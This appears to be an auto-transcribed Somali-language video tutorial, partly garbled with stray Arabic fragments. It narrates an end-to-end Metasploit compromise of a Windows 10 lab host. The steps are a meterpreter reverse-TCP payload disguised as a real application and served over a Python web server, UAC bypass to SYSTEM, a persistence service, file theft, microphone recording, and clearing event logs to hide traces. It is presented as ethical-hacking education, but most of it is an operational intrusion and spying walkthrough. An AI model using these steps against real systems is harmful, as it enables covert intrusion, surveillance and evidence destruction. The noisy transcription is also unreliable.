waxaan dhahanay payload oo x64 ah window ilen 64 bit waaye interpreter reverse tcp ii sameey ip gan waa linuxka boortigana dhoodi in laga soo xiriiraan rabaa applicationka aan rabno inaan dhex marno oo loo ekeysiiyo malwarekeen waa bootigan file exe ah iso formatkiisa iga soo dhig booti oo capital ah iso sameey booti oo capital ah waa kana uu sameeyay hadda dhahdid ls oo exe ah haday bootigan bisa arkeen hadda kana anagana loo soo sameeyay marka hadda waxaan sameynaynaa inaan sameeyno wax laho qaabkeen ku xabileena marka mostly qaab badan oo ku xabili kartaa qofka hadda kaba soo qaad inaa flash aad ugu shubtay aad dhahday new application kan tijaabi hadii qof local isku taqaanin uu yahay hadii kaleetana server inaad dhex dhigtid oo like python-m-http.server and 80 anaga hadda server anaga iska dhigaynaa inuu asagana la soo xiriiro oo serverkan uu ka degsado applicationkaas kadibna uu sidaas ku ran gareeyo anaga hadda waxaan iska dhigaynaa server marka python sidaan markaa dhahdid macnaheed waxa waaye desktopkeena meesha hadda anaga uu yaalo applicationka ayaan ogolaanay in la soo gaari karo oo laga degsan karo booti okay inta uusan targetka degsanin marka waxa qasab ah ina connection ka sameeyno meeshii haday aan dhahayno waxaan leenahay use exploit multi handler hadda maxaa sameynaynaa connection multi handler markaa sameysid payload automatic wuxuu ku sameeyay oo la dhaho shell reverse tcp laakiin anaga payload keeni ah haday sameyno muxuu ahaa xasuuso payload kana sameeyay inta soo koobi garay control c inta imo waxaa leedahay set payload waxaa leedahay control shift v kadibna waxaa leedahay options okay hadda marka option fiirisid waxaa lagaaga baahan yahay lhost haday maanta dhan waxaa gelin haday rhost maanta waxaa arkusa lhost yaa la gelina toogtaan waa listen address annaga dhageysanayno targetkana la soo xiriirayo waa reverse shell okay portigan 444 by default ku geli laakiin anaga portiga aan isticmaalno wuxuu ahaa port 111 marka payload ka sameeyneen okay waxaan labadaas ansaxeynaa marka sorry lhost anana 192.168.206.130 sidoo kale tana set port halena 1111 okay options everything waa set exploit leedahay marka exploit hadid macnaheed maxaa waaye listener ata hadda connection dhageysanaysa dalaqsi hada ay u dhahdeen kale hadda uma dhaheysid marka wuxuu sameeynaa in uu sameeyo connection dhageysasho wuxuu sugaa cid la soo xiriiri doonto waa IP-ga connection ka sugooyo portiga aan ka sugayn inaga la soo xiriirana waa portigan hadda sidoo kale tan waxaan u diyaarinay in serverkeeni uu open yahay oo wax laga degsan karo window-ga u imaanayna 192 IP-gan hadda meeshan ugu jeedid waa IP-ga Linux-keena marka dhahdid la xiriir okay wuxuu ku leeyahay directory listing waa IP-yada not secure wuxuu leeyahay de waa simple IP oo certificate ma lahan SSL certificate waxyaabo la xiriiro directory desktop wixii ku dhex jira waa anaga maxaa sameeynay port oo b-da capital ay tahay waxaan leenahay noo soo deji application-kii waa kana open inta ku dhahayno waxaan leenahay for directory-ga port waa kana soo jiid desktop-ka move garee kan iska xir application-kii waa kana port maxaa ujeedaa waa real application waa laakiin waa malware markay hackers sameynayaan waxay sameeyaan sidaan oo kale application legit ah ay waxay soo dhaxgeliyaan application koodii malware-ka ah hadii aad fiirisid halkan waa wuxuu server-keeni maxaa laga dejiyay application-kii port get request la isticmaalay port.exe ana laga degsaday 200 okay hadii aan fiirino MSF console-keena Metasploit-keena cidna la soo xiriirta male laakiin markaan inta dhahno double click oo aan dhahno run application kan oo qofkii oo port inuu ran gareeyo u maleynayo marka halkan fiirisid maxaa ujeedaa Interpreter session 2 open okay halkan markaan joogno get user ID ama waxa dhahdaa sys info
waxaa ujeedaa waa Windows 10. Windows 10 kan user ID giisana waa user level waa kaatib, waa yani user aan awood badan lahayn. haddaad session dhahdid oo gadaal u laabatid waxaan haysanaa session 2 meterpreter userkiisu uu yahay kaatib, waa normal user. walaala marka aad inaad ku laabatidna waxaa leedahay session 2 waxaa ku jirtaa meterpreter. marka fiiris hadda screenshot iga qaad inteen joogaa Windows 10. haddaad fiiris desktopka lagu save garay midkan uu ku qoran yahay waa kana Windows 10 kan haduu dambeeyay. okay booti now marka maxaan sameyn karnaa marka awaamiirta anaga oo nalooga baahan yahay inaan sameeyno sessionkeena session date mujeda isla markii sessionka horo ka dhimanaa oo Windows Defenderka asaga ku difaac oo ka qabanay as a security engineer marka ama as ethical hacker mar allaala markii systemka la galo waxyaabaha la sameeyo maxaa waaye in loo gudbo privilege escalation oo userkaas levelkiisa hooseeyo oo kaatibka ah inaad ka gudubtid oo aad aadid user ka sareeyo oo admin ah kadibna aad raadisid in aad persistence sameyso systemka aad gudaha u gashid. bal steps kasta u sameeyno again mar kale aan horta exploit aano aan sessionki dhageysano kadibna mar walba inuu userkeena oo run garay double click uu siiyo san uga maarano waxaan u baahanahay persistence waxaa loola jeedaa systemka inaa gudaha u gashid. by the time oo qof hacker oo system gudaha u galo isla markii wuxuu raadiyaa userkaas inuu ka gudbo another user kale oo awood badan inuu aado. hadda anaga listening ayaan nahay waxaan leenahay double click okay inta imaw new session oo session 3 aan loo furay get user marka fiirsa session kan help da commandiyada aan sameyn karno still waa sidii kii hore oo kale la mid yahay laakiin waxaan isku dayeynaa in aan sameeyno wax loo yaqaano privilege elevate commands oo ah privilege escalation inuu higher privilege oo admin level inaan gaarno. waxaan leenahay get system marka dhaadid okay get system waa laga diiday operation failed oo ma awoodi kartid inaad user admin heshid. okay background yaa leedahay hadda session hadda dhahdid session waxaan haysanaa 3 la dhaho oo userkiisan kaatib yahay post exploitation halkaan uu ka bilaabanaa. marka session keeni qaybta saddexaad waa halkaan. post exploitation waxaa loola jeedaa marka user gacanta ku dhigtid oo aad gashid next steps aad sameynaysid as security engineer muxuu yahay waxay tahay in aad isku dayidid in userka awood badan aa heshid si aad u sameyn kartid awood badan oo ka xoog badan userka normalka wuxuu sameynaa. session 3 aan aadayna kadib waxaan leenahay help very hashdam inaan sameeyno kale yani waxyaabaha oo systemka gudihiisa ku jiro some database inaan password ka soo helno kale hashdam hadaan dhahno waxaan leeyahay privilege ayaa kaaga xiran ma sameyn kartid. okay haddii aan dhahno get systemna oo anaga ma heli karno in aan admin level helno waa loo diiday. si aan marka awaamir xoog badan u sameyn karno waxaan u baahanahay userkeena inaan admin level ka dhigno. background yaa leedahay gadaal aad sessionka kadibna waxaan raadineynaa inaan bypass ku sameeyno search bypass user account control. user account control waxa waaye in user awood badan heshid waxaa ka caawin karo inaan bypass ku sameysid UAC waxyaabaha naga caawin karaan waa kuwan bypass ku qoraysaa kadibna kuwan dhan oo bypass la socdo ayaad soo qaadanaysaa mid kamid ah kan oo kale aan soo qaadano control C dhe okay use waxa leedahay control shift V options telephone iso okay marka bypass sa u sameysid marka waxa u baahan tahay session marka waxa u baahan tahay session waxaa leedahay set session kan muxuu ahaa horta xasuusin wala session 3 waaye okay set session 3 now options dhe everything is set kaliya aan bedelno portigan 444 ka waxaan ka dhigaynaa set kalen 2222 saan maaragtay uu ku soo xasuusano portigii hore oo aad ku sameynaysay MSF Venom waad ka bedelaysaa mar walba port cusub sameynaysa maxaa rabtaa new session inaa heshid okay
and halena option is everything is set now. Okay, halka windowgeena oo ka dhigayo x60 kan oo kala ansaxeena kanna waan saxeena waxaan leenahay set waxaan leenahay payload waxaan leenahay windows x64 meter reverse tcb kadibna waxaan leenahay set okay horta inuu bedelay targetka in kala aan hubino target kulma bedelin set target waxaan leenahay show target aan dhahno hal mar show target. Okay, set target 1. Now option is everything is set. Okay, now run new session in helna rabna oo admin level na siinayso. Okay, mujeda bypassing can bypass this setting. Continue new session please. New session, we need new session oo na siin karo admin level. Okay, another time run de maxaa dhacay maxaa yeelay wuxuu dhahay no session completed, exploit completed but no session was created. anagana waxaan rabnaa session sending stage. Yes, new session. Now haddii aad dhahay background fiiri oo aad dhahay session is maxaa ujeedaa session 3 iyo session 4 labadoodiiba laakiin waa usero oo caadi normal ah. marka aan session 4 ka hadda aan session 3 muxuu haystaa port 111, session 4 muxuu haystaa port 222. way kala madax banaan laba session waa laakiin same user waa. userka inaan bedelno waa si aan PC gan full control aan mar walba u haysan karno. session 4 kan galeynaa and now session 4 waxaan rabnaa get user ID hadda dhahayd waa desktop laakiin hadda hadaan dhulka waran privilege escalation commandigan hadaan isticmaalo fiiri help markaa dhahayd commandiga privilege loo isticmaalo oo lagu privilege kor lagu qaado hadda get system hadda wuu naga diiday laakiin hadda wuu na siiyay hadda get user ID. now waxaa tahay NT authority session is the background session is I haysted fiirisid haysataa session 3 iyo session 4. session 3 waa normal user level laakiin session 4 waxaa haystaa NT authority system level or which is a superpower oo dhigmo root system level oo dhigmo. Okay, at this session marka adoo haystid ayaa waxa u baahan tahay sessionka adoo haysto oo NT levelka inaad si degdeg ah u sameysid persistence. hadda awooda leedahay isku day in aad systemka gudihiisa u gashid. meeshan waa meesha ugu dambeyso ugu khatarsan ugu criticalsan. waxaan raadineynaa markaan search persistence. Okay, search and si qalad u qoray search persistence. Okay, content eco result una si persistence-ga anaga nooca aan ka rabno waa window. Okay, hadaan rabno window waa ku dari karnaa name window inaan dhahno exploit local persistence exploit windows midkaan rabaa local persistence service. Okay, kanoo kala soo qaado use. Okay, markaa fiirisid hadda wuxuu ku dhahay by default aniga kanaan isticmaalayo ku dhahay ma ka waalinayaan. waxaan leenahay option anaga hadda persistence yaan rabnaa soo ma ah persistence u sameysid maxaa lagaaga baahan yahay oo required waxaa horta session. Okay, sessionadeen aan fiirino midka NT level kan lagaaga baahan yahay set session 4 up set session space 4. now option is dheh. Okay, session 4 waa gelinay boortiga 444 uu yahay midaan boortigan waa ka bedeleynaa. let's aan dhahno set l port waxaan dhahaynaa مثلا 333 oo kale. Okay, hadda waxaan leenahay options wax walbo wuu noo diyaarsan yahay. now aan dhahno exploit new session inaan helno waa now new session oo ka madax banaan kuwii aan hore u helnay session 5. wuxuu noo faa'iideynaa marka wuxuu noo faa'iideynaa aan gadaal u laabno anaa idin tusinaayo. now aan dhahno sessions meeqa haysana 3 session
session kan waa kii normal user ka ahaa, session kan waa kii admin level ka aan ku gaarnay, session kan oo portigiisa 3333 yahayna waa session ka persistence ga noo ah. Now aan dhahno session 5 midka hadda ugu dambeeyay session kaas aan galeynaa. kadib waxaan leenahay our system في system كان نص قاد كان نوجي هنروح هنا نكتسيه وهكذا system كيني لينكس كنا سجنا نويري موجودة إسبر بردك لو هذا مركا هل كان في ريست لو هذا في مركا clear okay وحيابها عن سمين كرنو وحكمت okay search whatever search anything ورتنتي جوكنا ورتان مر BWD system ka joogna cd home c aan jooga cd users katib desktop okay ls pwd desktop aan jooga dir dheh waxaa hada ku jiro intaan oo file. Now I can download anything aan hada u baahanay kan oo kale hada maalkan oo kale aan download gareeyo maal .pdf home Kali desktop. Okay desktop kayga hadaan fiiriyo oo aan dhaho like fiiri kan hoos igrig kan hoos igrig kan hoos igrig mujeda new file oo hadda igu soo kordhay waay wax alaal wixii documentigan ku jiro. Haddii aan rabo inaan sameeyo مثلا tusaale ahaan in aan baaro wax walbo confidential waxaan dhihi karaa search all wax walbo oo waxa ii raadisa .pdf file ah ii dhex raadi. Okay oo waxaan ilooway flag oo file wixii ah search all files oo dhammaan wixii pdf ah fadlan ii raadi. marka commandigan wuxuu ku siinaa marka rabto inaad muddo ilaa persistence ay hadda session kan uga xiran ma kaabsanoy anytime ani aan soo galo waxaan rabaa computer kan ka sameyn karaa. Let's proof gareeyo marka. Okay horta commandigan ii dhameeyo raadinta uu raadinayo wuxuu ku jiraa in uu search gareeyo dhammaan wixii pdf file ah. Now we own this system kan anaga hadda haysana oo gacanta noogu jira. Okay uu raadiyay wuxuu soo helay intaan oo document la dhaho pdf malware analysis mid ah iyo pdf mal labadaas oo kaliya labadan pdf oo kaliya ayaa ku jirto. waxaan sheegayna marka inuu run yahay in kale bal aan hubin. waxaan leenahay reboot system kan u dir waxaan leenahay reboot -f oo force am force dhan marban just reboot mujeda system ka dhan anaga gacanta ku haynaba reboot u dirtay then all sessions ki waa ka xirmeen. session 4 ki oo system level ka ahaa ki ka horeeyay oo session 3 ka ahaa oo katib labada session ka xirmeen. hadda waxa ku furan midka hadda adiga gacanta ku haysid oo session 5 ah oo kaliya. Okay asaga xitaa waa xireyna hadda rabno. hadda aan dhahno مثلا background dheh haddii lacala saan oo kale session ku kaaga dhaco maxaa sameynayna. Okay another in markale oo rangareema loo baahan yahay maya kan dhan waa tireenaa hadda. Okay permanently delete application ki aan ku soo galnay waa hadda marka hadda application ka dhan waa tirna. Okay seen sameynayna marka just very back dheh clear just adi persistence macnaheed waxa waaye gudaha systemka ku jirta exploit multi handler waxa kaliya u baahan tahay inaad fiirisid yani portigii aan sameynayna markii sessionka aan rabnay inaan persistence ka dhigno portiga aan sameeyno muxuu ahaa 333 uu ahaa xasuuso remember. sidoo kale tana muusan ahayn x64 muusan ahayn. Okay waxaan leenahay set payload waxaan leenahay windows wuxuu ahaa meter operator just reverse tcb kadibna l port
hadana 3333 okay mujeda sidaan uu ahaa payloadkiisa hadda ana xasuusto payloadkaan aan sameynay boortigana boort 33 oo ahaa boortiga u dambeeyay just hadda application-kina waa tirnay laakiin gudaha systemka ku jirta waxa kaliya u baahan tahay exploit okay now waxa heli doonaa asagoo systemkina laga warqabin new session 6 open kida okay now u baahnid marka inaan markale application-ka run dhahdid iyo waxyaabo la mid ah mujeda help hadaad dhahdid fiiri wax walbo oo u baahan tahay waa sameyn kartaa any kind oo commands ah okay حتى هذا عربنا يعني record microphone keys inaan duubano kale waxaan sameyn karnaa مثلا record dash help ده okay waxaan u baahan tahay options kala sameynayo d number of second okay aan dhahno by default 1 second waaye aan dhahno record dash d 10 second oo cod ahno duub bismillahir rahmanir rahiim waa tijaabo wali maqlaaya okay 10 second ma dhamaatay okay waa dhamaatay 10 second waxa lagu save gareeyay halkan desktop-ka Linux-ka hada fiirisid desktop ma yaala cod noocaas ah waa kana okay horta asaga ma yahay fiiri hal mar zb ma u dambeeyaa zb okay aan shidna bal system-kan guud ahaan anaga heesano wax walba aan ka samaysan karnaa file aan tiri karnaa waa jaasuus karnaa codkiisa dhageysan karnaa muuqaalan ka duuban karnaa wax walba ku jiro full control system-kan anaga ayaa heesano markii ay hackers-ka marka ay danahoodii ay ka dhameystaan ama security engineers-ka ay danahoodii ka dhameystaan oo waxay sameeyaan ay sameeyaan oo ujeedadoodii ay gaaraan waxay sameeyaan covering tracks wax la dhaho in system-ka ay clear ka dhigaan clear maxaa loo jeedaa command waxaa jiro halkan ku jiro oo la dhaho clear event management aan hadda fiirino waa kana commandiga system commands waxaa la clear event management clear the event log the event log waxaa loo jeedaa inaad test sameysid oo weerar ku sameysid system weerarkaaga wuxuu ku qormi doonaa ama diiwaan gashmi doonaa log files ka meesha la dhaho log files waxa waa every single event walbo oo event viewer-ka markaa fiirisid hadaan dhahdid event viewer Windows event viewer markii systemka oo system weyn yahay ayadana meel gaar oo loogu talagal lagu qoraa jiro intaan oo events ah ayaa ku jiro oo macnaheedu uu yahay 16384 events uu leeyahay security log asagana wuxuu leeyahay 4000 waa iyo something system logs sidaas oo kaleete ayadana waa 10000 iyo jajab oo log marka fiirisid marka logskan waxa ku qormaayo wax walba oo event oo laga sameeyay iyo cidii sameysay iyo user-kii sameeyay fiiri hada halkan fiiri information okay information kan event data meesha waxay ka dhaceen system cidii sameysay system kan xiliga waxa soo dhacay halkan ku wada qoran yihiin anaga raadkeena intuu ku soo hari doona marka si uusan raadka ugu soo harin waxay sameeyaan security engineers-ka in ay sameeyaan clear log file in ku sameeyaan waxay dhahayaan clear env taasoo macnaheedu uu yahay tirtir waxa la tirtiray wiping waxa waa tirtirid oo lagu sameeyay 347 record oo anaga aan shaqo ku lahayn aan sameeynay system iyo security 22000 oo events ah hadda di ay xirtid oo markale aa furtid event viewer aad dhahdid event viewer anayd waxa waaye wax logis ah meesha ku arki doontid okay meesha day inta soo log ah empty waa hada mujeeda wax ku jira male system log empty marka fiirisa hada fiiri shaashadan weyneeno weyneysid maxaa lagu dhahay waxa eventiga hada dhacay saacadan log clear log la tirtiray marka fiirisid maxaa lagu leeyahay the system log file was cleared okay ada tirtirtanya waa user oo system level aday markaan soo galeen system level computerka laga tirtiray wixii la sameeyo dhan laakiin hackers ka tirtireen si aysan loogu ogaanin meesha ay degan yihiin iyo waxaas iyo system code magaciisa iyo xog kala dheeraad san looga helin that is marka waxa aan maanta ugu talagalnay
muuqaalkeena maanta. Markii saa ma tahay marka hadda systemkan si dhan waa demin karnaa haddaan rabno. Comment aan u reebi karnaa oo waxaan dhihi karnaa you have been hacked my friend. Okay, shut down. Okay, so marka hadda computerkii anaga aan haysanay sidaas ayaan ku maaragtay daminay. macnaheed maxaa waaye computerkan full control anaga haysano. marka insha Allah taala muuqaalkeena oo maanta halkaas ayuu ku eg yahay. waa mahadsantahay daawashadaada. waxaan rajeynayaa inaan wax uun ka faa'iiday. waxaan ka cudur daarnaa inuu muuqaalka aad u dheer yahay. sidoo kaleete waxaan ka codsanaa in aad asxaabta jecel cyber security-ga iyo dhammaan asxaabtaada inaad la wadaagto muuqaalkan, channelka aad ku soo biirtid, subscribe dhahdid, sidoo kale share gareemel dheer gaarsii iyo haddii like wixii la dhihi jiray adiga wax uun sameey. inta aan marka muuqaalka xig ku kulmi doono sidaas iyo nabad gelyo. waa mahadsantihiin.